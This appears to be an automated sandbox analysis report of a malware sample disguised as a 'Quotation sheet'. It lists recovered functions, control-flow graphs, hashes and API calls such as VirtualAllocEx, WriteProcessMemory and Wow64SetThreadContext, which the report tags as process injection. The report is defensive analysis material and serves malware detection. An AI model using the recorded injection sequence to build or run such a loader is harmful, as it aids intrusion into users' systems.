                                                                                                                        • Instruction Fuzzy Hash: 20B2D074E01228CFDB64CF69C994AD9BBB2FF89304F1581E9D509AB225DB319E81CF40
                                                                                                                        Function 094D975E Relevance: 1.8, Strings: 1, Instructions: 561COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 174 94d975e-94d9762 175 94da125-94da131 174->175 176 94d9763-94d9778 174->176 176->175 177 94d9779-94d9784 176->177 179 94d978a-94d9796 177->179 180 94d97a2-94d97b1 179->180 182 94d9810-94d9814 180->182 183 94d98bc-94d9926 182->183 184 94d981a-94d9823 182->184 183->175 222 94d992c-94d9e73 183->222 185 94d971e-94d972a 184->185 186 94d9829-94d983f 184->186 185->175 188 94d9730-94d973c 185->188 192 94d9891-94d98a3 186->192 193 94d9841-94d9844 186->193 190 94d973e-94d9752 188->190 191 94d97b3-94d97b9 188->191 190->191 201 94d9754-94d975d 190->201 191->175 194 94d97bf-94d97d7 191->194 202 94d98a9-94d98ac 192->202 203 94da064-94da11a 192->203 193->175 196 94d984a-94d9887 193->196 194->175 205 94d97dd-94d9805 194->205 196->183 218 94d9889-94d988f 196->218 201->174 206 94d98af-94d98b9 202->206 203->175 205->182 218->192 218->193 300 94d9e8a-94d9f1d 222->300 301 94d9e75-94d9e7f 222->301 302 94d9f28-94d9fbb 300->302 301->302 303 94d9e85 301->303 304 94d9fc6-94da059 302->304 303->304 304->203
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 0-2746444292
                                                                                                                        • Opcode ID: c79d20b9b866bcf72b36eac41f4d622a067ef1143a49b67d22f8458e7d7880ba
                                                                                                                        • Instruction ID: 4242a1f3344540ea59a03609a944b93ecde0fa63dc817ac111e6b70f2b014c0a
                                                                                                                        • Opcode Fuzzy Hash: c79d20b9b866bcf72b36eac41f4d622a067ef1143a49b67d22f8458e7d7880ba
                                                                                                                        • Instruction Fuzzy Hash: 5F528674A112198FDB64DF64C998B9DBBB2FF89300F1081E9D509AB765CB349E81CF90
                                                                                                                        Function 059D4870 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2352504395.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_59d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: {
                                                                                                                        • API String ID: 0-366298937
                                                                                                                        • Opcode ID: 3f28e4005619979f8022235f55ef8445e472c1229558b39eec7e38816281ed32
                                                                                                                        • Instruction ID: e423cd1a4c0cb940bfe1be21494b197a1333573a5c54331d2f688ff5d88d1181
                                                                                                                        • Opcode Fuzzy Hash: 3f28e4005619979f8022235f55ef8445e472c1229558b39eec7e38816281ed32
                                                                                                                        • Instruction Fuzzy Hash: 6A810274E04249CFDB04CFA9D484AEEFBF2BF89300F14C52AD419AB255D7749A46CB60
                                                                                                                        Function 094D6650 Relevance: .7, Instructions: 722COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 39cb7f3de076ac8e132482211392e190accf4d3e3ad69ede2f69a5433a71b18b
                                                                                                                        • Instruction ID: ad869322186cf1f6366077e9bc8140a70f79e716667f5fe681a2ad8ec4b0c9bc
                                                                                                                        • Opcode Fuzzy Hash: 39cb7f3de076ac8e132482211392e190accf4d3e3ad69ede2f69a5433a71b18b
                                                                                                                        • Instruction Fuzzy Hash: A1528038B01119DFDB14DF69C4A4A6EBBB2FF88750B16816AF8059B364DB35EC41CB90
                                                                                                                        Function 078CCE50 Relevance: .4, Instructions: 401COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 349ead32d21b227df55d97c51306bbc04510155fce7178b223688b3fa74e248b
                                                                                                                        • Instruction ID: baa188a84b508118122dd18251602a5ff7fb4e94b374f297468127ff388748e5
                                                                                                                        • Opcode Fuzzy Hash: 349ead32d21b227df55d97c51306bbc04510155fce7178b223688b3fa74e248b
                                                                                                                        • Instruction Fuzzy Hash: 3FE1B0B1B012058FDB15EF79C454BAEB7FAAF98700F14446DD14ADB2A0DB35E801CB61
                                                                                                                        Function 078C2C90 Relevance: .1, Instructions: 100COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a5510944d60348af4eda47a8aa3e18fc1f8d813a6be7f7ad43f5cce19aeadb79
                                                                                                                        • Instruction ID: 6d125d0c5e97e322c22b6422706888ac4e7cde0c2030705d1bd0050bdd83b3ca
                                                                                                                        • Opcode Fuzzy Hash: a5510944d60348af4eda47a8aa3e18fc1f8d813a6be7f7ad43f5cce19aeadb79
                                                                                                                        • Instruction Fuzzy Hash: 394127B1D0461C8BEB18CFAAC8497DEBBF6BF99304F04C06AD509A6254DB7449858F90
                                                                                                                        Function 078C2CA0 Relevance: .1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cc5f040b7057789ef01f5b01b116da6f498d6cce907f55b1b08e59f0ee000675
                                                                                                                        • Instruction ID: f6670a56ab843a2815166534666d8bb9baf5419fd6a80afe9088a936a129ac8f
                                                                                                                        • Opcode Fuzzy Hash: cc5f040b7057789ef01f5b01b116da6f498d6cce907f55b1b08e59f0ee000675
                                                                                                                        • Instruction Fuzzy Hash: 4C4107B1D0421CCBEB58CFAAC8487EEFAF6BF99304F04C06AD509A6254DB7449858F50
                                                                                                                        Function 078C882F Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 329 78c882f-78c88cd 331 78c88cf-78c88d9 329->331 332 78c8906-78c8926 329->332 331->332 333 78c88db-78c88dd 331->333 339 78c895f-78c898e 332->339 340 78c8928-78c8932 332->340 334 78c88df-78c88e9 333->334 335 78c8900-78c8903 333->335 337 78c88ed-78c88fc 334->337 338 78c88eb 334->338 335->332 337->337 341 78c88fe 337->341 338->337 346 78c89c7-78c8a81 CreateProcessA 339->346 347 78c8990-78c899a 339->347 340->339 342 78c8934-78c8936 340->342 341->335 344 78c8938-78c8942 342->344 345 78c8959-78c895c 342->345 348 78c8944 344->348 349 78c8946-78c8955 344->349 345->339 360 78c8a8a-78c8b10 346->360 361 78c8a83-78c8a89 346->361 347->346 350 78c899c-78c899e 347->350 348->349 349->349 351 78c8957 349->351 352 78c89a0-78c89aa 350->352 353 78c89c1-78c89c4 350->353 351->345 355 78c89ac 352->355 356 78c89ae-78c89bd 352->356 353->346 355->356 356->356 357 78c89bf 356->357 357->353 371 78c8b20-78c8b24 360->371 372 78c8b12-78c8b16 360->372 361->360 374 78c8b34-78c8b38 371->374 375 78c8b26-78c8b2a 371->375 372->371 373 78c8b18 372->373 373->371 377 78c8b48-78c8b4c 374->377 378 78c8b3a-78c8b3e 374->378 375->374 376 78c8b2c 375->376 376->374 379 78c8b5e-78c8b65 377->379 380 78c8b4e-78c8b54 377->380 378->377 381 78c8b40 378->381 382 78c8b7c 379->382 383 78c8b67-78c8b76 379->383 380->379 381->377 385 78c8b7d 382->385 383->382 385->385
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 078C8A6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 963392458-0
                                                                                                                        • Opcode ID: b0c9897d950e03dce17aacdf145eaa0568f4a731ea17d24abb235045055311cf
                                                                                                                        • Instruction ID: 1deaec26c90426bf0626c6bcf2de1c1874e5220913cf762eb0ca63f6fbf336b6
                                                                                                                        • Opcode Fuzzy Hash: b0c9897d950e03dce17aacdf145eaa0568f4a731ea17d24abb235045055311cf
                                                                                                                        • Instruction Fuzzy Hash: E29139B1D0021ADFEB24CF68C841BDDBBB2BF48314F1485A9E849A7240DB759985CF92
                                                                                                                        Function 078C8838 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 386 78c8838-78c88cd 388 78c88cf-78c88d9 386->388 389 78c8906-78c8926 386->389 388->389 390 78c88db-78c88dd 388->390 396 78c895f-78c898e 389->396 397 78c8928-78c8932 389->397 391 78c88df-78c88e9 390->391 392 78c8900-78c8903 390->392 394 78c88ed-78c88fc 391->394 395 78c88eb 391->395 392->389 394->394 398 78c88fe 394->398 395->394 403 78c89c7-78c8a81 CreateProcessA 396->403 404 78c8990-78c899a 396->404 397->396 399 78c8934-78c8936 397->399 398->392 401 78c8938-78c8942 399->401 402 78c8959-78c895c 399->402 405 78c8944 401->405 406 78c8946-78c8955 401->406 402->396 417 78c8a8a-78c8b10 403->417 418 78c8a83-78c8a89 403->418 404->403 407 78c899c-78c899e 404->407 405->406 406->406 408 78c8957 406->408 409 78c89a0-78c89aa 407->409 410 78c89c1-78c89c4 407->410 408->402 412 78c89ac 409->412 413 78c89ae-78c89bd 409->413 410->403 412->413 413->413 414 78c89bf 413->414 414->410 428 78c8b20-78c8b24 417->428 429 78c8b12-78c8b16 417->429 418->417 431 78c8b34-78c8b38 428->431 432 78c8b26-78c8b2a 428->432 429->428 430 78c8b18 429->430 430->428 434 78c8b48-78c8b4c 431->434 435 78c8b3a-78c8b3e 431->435 432->431 433 78c8b2c 432->433 433->431 436 78c8b5e-78c8b65 434->436 437 78c8b4e-78c8b54 434->437 435->434 438 78c8b40 435->438 439 78c8b7c 436->439 440 78c8b67-78c8b76 436->440 437->436 438->434 442 78c8b7d 439->442 440->439 442->442
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 078C8A6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 963392458-0
                                                                                                                        • Opcode ID: d326123b296504e547e39ca4bae8755874d5f1023deaa5f9186bbfd13d871d1d
                                                                                                                        • Instruction ID: 0fd4e6d34207be1c3062cf48bfad3d06e1a823260aa655db92f6d0c5b72244dd
                                                                                                                        • Opcode Fuzzy Hash: d326123b296504e547e39ca4bae8755874d5f1023deaa5f9186bbfd13d871d1d
                                                                                                                        • Instruction Fuzzy Hash: 939138B1D0021ADFEB24CF68C841BDDBBB2BF48314F1485A9E849E7240DB759985CF92
                                                                                                                        Function 078C84E8 Relevance: 1.6, APIs: 1, Instructions: 79memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 443 78c84e8-78c84e9 444 78c84eb-78c856b VirtualAllocEx 443->444 445 78c8495-78c84b8 443->445 453 78c856d-78c8573 444->453 454 78c8574-78c8599 444->454 449 78c84ba-78c84c0 445->449 450 78c84c2 445->450 451 78c84c5-78c84da 449->451 450->451 453->454
                                                                                                                        APIs
                                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 078C855E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 603c04a783304cb70a2d0d5b03ea72dc235c40d846572817a81774373b82baeb
                                                                                                                        • Instruction ID: e41de2ab46ff706f7a96f21d7e2651a5945a3422f19fc2fc069c0721539e9bf5
                                                                                                                        • Opcode Fuzzy Hash: 603c04a783304cb70a2d0d5b03ea72dc235c40d846572817a81774373b82baeb
                                                                                                                        • Instruction Fuzzy Hash: 083105B6900249DFDB10CFA9D885BEEBBB5EF88324F108419E619AB250D775A950CB90
                                                                                                                        Function 059DE114 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 460 59de114-59df744 462 59df74f-59df75e 460->462 463 59df746-59df74c 460->463 464 59df760 462->464 465 59df763-59df79c DrawTextExW 462->465 463->462 464->465 466 59df79e-59df7a4 465->466 467 59df7a5-59df7c2 465->467 466->467
                                                                                                                        APIs
                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,059DF6DD,?,?), ref: 059DF78F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2352504395.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_59d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DrawText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2175133113-0
                                                                                                                        • Opcode ID: f3f7c2e91f686b1f09de3be32ef6f20a15bb3fb98138301c565d4732eeb26158
                                                                                                                        • Instruction ID: db97e6890c177a32a89668dd569e3e627d29d2a3ba9da5dc4274d19f829b2d2d
                                                                                                                        • Opcode Fuzzy Hash: f3f7c2e91f686b1f09de3be32ef6f20a15bb3fb98138301c565d4732eeb26158
                                                                                                                        • Instruction Fuzzy Hash: 8131E4B59003099FDB50CF9AD8846DEFBF5FF48320F24842AE919A7210D775A944CFA0
                                                                                                                        Function 078C85A8 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 470 78c85a8-78c85fe 473 78c860e-78c864d WriteProcessMemory 470->473 474 78c8600-78c860c 470->474 476 78c864f-78c8655 473->476 477 78c8656-78c8686 473->477 474->473 476->477
                                                                                                                        APIs
                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 078C8640
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3559483778-0
                                                                                                                        • Opcode ID: 09d04d8c5d46a8e581036340a6b90645db6900cbd1f523bc1d0b947b194a09e0
                                                                                                                        • Instruction ID: 98b24ba5f4dccb3cb00e00b792589a76b282c9f4533faf01f6a8404077a1bb02
                                                                                                                        • Opcode Fuzzy Hash: 09d04d8c5d46a8e581036340a6b90645db6900cbd1f523bc1d0b947b194a09e0
                                                                                                                        • Instruction Fuzzy Hash: 1C2128B59003599FDF10CFA9C885BDEBBF5FF88310F148429E958A7240D778A954CBA4
                                                                                                                        Function 059DF6F0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 481 59df6f0-59df744 482 59df74f-59df75e 481->482 483 59df746-59df74c 481->483 484 59df760 482->484 485 59df763-59df79c DrawTextExW 482->485 483->482 484->485 486 59df79e-59df7a4 485->486 487 59df7a5-59df7c2 485->487 486->487
                                                                                                                        APIs
                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,059DF6DD,?,?), ref: 059DF78F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2352504395.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_59d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DrawText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2175133113-0
                                                                                                                        • Opcode ID: 5947b1228ecc0ed8a99f3892e6dfde05207a835755560f53e9b68028c529da52
                                                                                                                        • Instruction ID: 43a6a5c4fc55c33b9973723abb46d21d820b05096a34ab772fce2b1452858204
                                                                                                                        • Opcode Fuzzy Hash: 5947b1228ecc0ed8a99f3892e6dfde05207a835755560f53e9b68028c529da52
                                                                                                                        • Instruction Fuzzy Hash: AD31E0B5D002499FDB10CF99D9856EEFBF5BF48324F28842AE919A7210D774A540CFA0
                                                                                                                        Function 078C85B0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 490 78c85b0-78c85fe 492 78c860e-78c864d WriteProcessMemory 490->492 493 78c8600-78c860c 490->493 495 78c864f-78c8655 492->495 496 78c8656-78c8686 492->496 493->492 495->496
                                                                                                                        APIs
                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 078C8640
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3559483778-0
                                                                                                                        • Opcode ID: 400e50103862ccd5cd27589c111eb2732ead8ea01a0c9c1ce4fabae6f19ce19a
                                                                                                                        • Instruction ID: cfea076ac773ad3516ba630f3e2d74ed65820a28897213353c34f6694cc0bbce
                                                                                                                        • Opcode Fuzzy Hash: 400e50103862ccd5cd27589c111eb2732ead8ea01a0c9c1ce4fabae6f19ce19a
                                                                                                                        • Instruction Fuzzy Hash: C22126B19003599FDB10CFA9C885BDEBBF5FF88310F10842AE918A7240D7789954CBA4
                                                                                                                        Function 078C7FD8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 500 78c7fd8-78c802b 503 78c802d-78c8039 500->503 504 78c803b-78c806b Wow64SetThreadContext 500->504 503->504 506 78c806d-78c8073 504->506 507 78c8074-78c80a4 504->507 506->507
                                                                                                                        APIs
                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078C805E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 983334009-0
                                                                                                                        • Opcode ID: 091a67b01ac7b6e65b56027e5daa707daf43475e707fdf0d692e16b57cbc0c90
                                                                                                                        • Instruction ID: 2d0ae4cc38a95bfdee95f203e0eb6188fcc0d8f7631c70211db557b5e1742578
                                                                                                                        • Opcode Fuzzy Hash: 091a67b01ac7b6e65b56027e5daa707daf43475e707fdf0d692e16b57cbc0c90
                                                                                                                        • Instruction Fuzzy Hash: A52159B29003099FEB10CFAAC4857AEBBF4EF48324F14842DD519A7240DB78A944CFA5
                                                                                                                        Function 078C8698 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 521 78c8698-78c872d ReadProcessMemory 524 78c872f-78c8735 521->524 525 78c8736-78c8766 521->525 524->525
                                                                                                                        APIs
                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 078C8720
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1726664587-0
                                                                                                                        • Opcode ID: de09073777391cab2c5ff59b6405058c503400932210b9b588371aea5524360b
                                                                                                                        • Instruction ID: c7b8b12b57f5520ce5ca6153a14b53e1e9a71f083b014c55d1cc56b1d7ed323e
                                                                                                                        • Opcode Fuzzy Hash: de09073777391cab2c5ff59b6405058c503400932210b9b588371aea5524360b
                                                                                                                        • Instruction Fuzzy Hash: FA2105B1D0034ADFDB10DFA9C881ADEBBF1FF48320F10842AE958A7250D7799954DBA5
                                                                                                                        Function 078C86A0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 529 78c86a0-78c872d ReadProcessMemory 532 78c872f-78c8735 529->532 533 78c8736-78c8766 529->533 532->533
                                                                                                                        APIs
                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 078C8720
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1726664587-0
                                                                                                                        • Opcode ID: d21f50adf3b2509f6c0f490ac8d734f398b2c3c4644b2b7432657a33ab08e925
                                                                                                                        • Instruction ID: 59bf2e62c33f26a5269066fb873fbc844c140f9de6775936b1ecfb39667fdf94
                                                                                                                        • Opcode Fuzzy Hash: d21f50adf3b2509f6c0f490ac8d734f398b2c3c4644b2b7432657a33ab08e925
                                                                                                                        • Instruction Fuzzy Hash: 272116B18003499FDB10CFAAC881ADEBBF5FF48320F108429E558A7240D7799950CBA5
                                                                                                                        Function 078C7FE0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 511 78c7fe0-78c802b 513 78c802d-78c8039 511->513 514 78c803b-78c806b Wow64SetThreadContext 511->514 513->514 516 78c806d-78c8073 514->516 517 78c8074-78c80a4 514->517 516->517
                                                                                                                        APIs
                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078C805E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 983334009-0
                                                                                                                        • Opcode ID: 7f348a6b7cb28208e8d728f147eebe81813baa6905eec7e22ecb80730fcf0cd5
                                                                                                                        • Instruction ID: 8239ef0bfc808a222b46e1f7059bd12426bfca631b8e55dbd207f14803c017b9
                                                                                                                        • Opcode Fuzzy Hash: 7f348a6b7cb28208e8d728f147eebe81813baa6905eec7e22ecb80730fcf0cd5
                                                                                                                        • Instruction Fuzzy Hash: CE213AB19003099FDB10CFAAC4857AEBBF4EF48324F14842DD519A7240DB789544CFA5
                                                                                                                        Function 078C84F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 537 78c84f0-78c856b VirtualAllocEx 540 78c856d-78c8573 537->540 541 78c8574-78c8599 537->541 540->541
                                                                                                                        APIs
                                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 078C855E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: a1db6b50d0794c1d3010de17134d8b7b7de6c44e22ac1028e651b4d6dd89aff4
                                                                                                                        • Instruction ID: 5d2c62581ec1fc3ae0e83ecef189ec452881368a0f4e9e9057bc9c7cda1a740f
                                                                                                                        • Opcode Fuzzy Hash: a1db6b50d0794c1d3010de17134d8b7b7de6c44e22ac1028e651b4d6dd89aff4
                                                                                                                        • Instruction Fuzzy Hash: 7A1156B28003499FDB10CFAAC845BDFBBF5EF88720F108419E619A7250CB75A510CBA0
                                                                                                                        Function 059D4EA8 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 545 59d4ea8-59d552a SetTimer 547 59d552c-59d5532 545->547 548 59d5533-59d5547 545->548 547->548
                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,01A56428,?,?,?,?,?,?,059D5378,00000000,00000000,?), ref: 059D551D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2352504395.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_59d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Timer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2870079774-0
                                                                                                                        • Opcode ID: 86f3425112f1f151c6d86e69af2c5041702c0dbf6848edaf4466badc53500908
                                                                                                                        • Instruction ID: 8b85b4a2378f005c6205ee407e07d997a4af330d2eae12301ea945ec20e9333e
